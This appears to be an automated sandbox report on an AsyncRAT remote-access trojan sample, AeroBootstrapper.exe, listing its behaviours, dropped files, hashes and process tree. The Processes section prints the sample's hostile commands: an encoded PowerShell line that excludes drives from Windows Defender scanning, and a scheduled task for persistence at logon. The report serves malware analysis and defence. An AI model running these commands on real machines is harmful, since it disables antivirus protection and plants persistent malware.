Malware Analysis Report

2024-09-22 07:02

Sample ID 240617-wzxb1atakq
Target AeroBootstrapper.exe
SHA256 b568a346e301f5d5f0732e6e6305e2a3f43b45c0957859aa49663ce9053af618
Tags
asyncrat default execution rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b568a346e301f5d5f0732e6e6305e2a3f43b45c0957859aa49663ce9053af618

Threat Level: Known bad

The file AeroBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default execution rat

AsyncRat

Async RAT payload

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Program crash

Unsigned PE

Enumerates physical storage devices

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-17 18:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 18:22

Reported

2024-06-17 18:23

Platform

win11-20240508-en

Max time kernel

40s

Max time network

49s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
PID 1856 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
PID 1856 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
PID 1856 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 1856 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 1856 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4012 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1996 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1996 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2860 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2860 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2860 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAcgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQB0ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "%AppData%" /tr '"C:\Users\Admin\AppData\Roaming\%AppData%.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7AFC.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "C:\Users\Admin\AppData\Roaming" /tr '"C:\Users\Admin\AppData\Roaming\C:\Users\Admin\AppData\Roaming.exe"'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1952 -ip 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1488

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.nodejs.org udp

Files

C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

MD5 3ef6a6f8a984c661f58c373081986213
SHA1 13f18179a85ae650bcfa70b47d027b0b3fe84d6e
SHA256 0b657c945d9ebee7f0b8a48be6f1abf4b9dbf2c0c609fc8030818a2229dd175e
SHA512 e7c6bc2b7e4d5d252b4b05628cab64007e5c0cec15657ee533ec78c7cd4546afb27df7b5b6be82b5d8bda085b93463dadaae41b74ccd6061b0ee7b2f68de27df

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

memory/4012-21-0x000000007319E000-0x000000007319F000-memory.dmp

memory/3904-23-0x00000000029C0000-0x00000000029F6000-memory.dmp

memory/4012-24-0x00000000008C0000-0x00000000008D8000-memory.dmp

memory/1952-25-0x0000000000C60000-0x0000000000D2E000-memory.dmp

memory/3904-26-0x0000000005100000-0x000000000572A000-memory.dmp

memory/3904-27-0x0000000073190000-0x0000000073941000-memory.dmp

memory/4012-28-0x00000000057F0000-0x0000000005D96000-memory.dmp

memory/3904-30-0x0000000073190000-0x0000000073941000-memory.dmp

memory/1952-31-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-32-0x0000000004F80000-0x0000000004FA2000-memory.dmp

memory/3904-39-0x0000000005910000-0x0000000005976000-memory.dmp

memory/3904-43-0x0000000073190000-0x0000000073941000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wywwqmkn.qjc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3904-33-0x0000000005730000-0x0000000005796000-memory.dmp

memory/3904-44-0x0000000005A00000-0x0000000005D57000-memory.dmp

memory/4012-45-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-47-0x0000000005E80000-0x0000000005ECC000-memory.dmp

memory/3904-46-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/3904-49-0x0000000073A90000-0x0000000073ADC000-memory.dmp

memory/3904-58-0x0000000006E00000-0x0000000006E1E000-memory.dmp

memory/3904-48-0x0000000006DC0000-0x0000000006DF4000-memory.dmp

memory/3904-59-0x0000000006E30000-0x0000000006ED4000-memory.dmp

memory/3904-61-0x00000000071A0000-0x00000000071BA000-memory.dmp

memory/3904-60-0x00000000077D0000-0x0000000007E4A000-memory.dmp

memory/3904-62-0x0000000007210000-0x000000000721A000-memory.dmp

memory/3904-63-0x0000000007410000-0x00000000074A6000-memory.dmp

memory/3904-64-0x0000000007390000-0x00000000073A1000-memory.dmp

memory/4012-69-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-70-0x00000000073D0000-0x00000000073DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7AFC.tmp.bat

MD5 6918bb9ed24e0c2a7ce63564b89e678f
SHA1 4c95d6c6b3287e6796652313dc4cc2465cf780e2
SHA256 38926805b9ce9dcf107b342a2a0e72a1d01a2c95f1793b553ea0c7a50a2facaf
SHA512 ae630e7e36de75a59e6e47d0b31fe55f9bc85f2ac1f37c0025270966ae85bcdd2347d4cc1216dfc63477a09608506f3290005abff7fd198e8e1f638f89a229c6

memory/3904-72-0x00000000073E0000-0x00000000073F5000-memory.dmp

memory/3904-73-0x00000000074D0000-0x00000000074EA000-memory.dmp

memory/3904-74-0x00000000074C0000-0x00000000074C8000-memory.dmp

memory/3904-77-0x0000000073190000-0x0000000073941000-memory.dmp

memory/1952-78-0x0000000073190000-0x0000000073941000-memory.dmp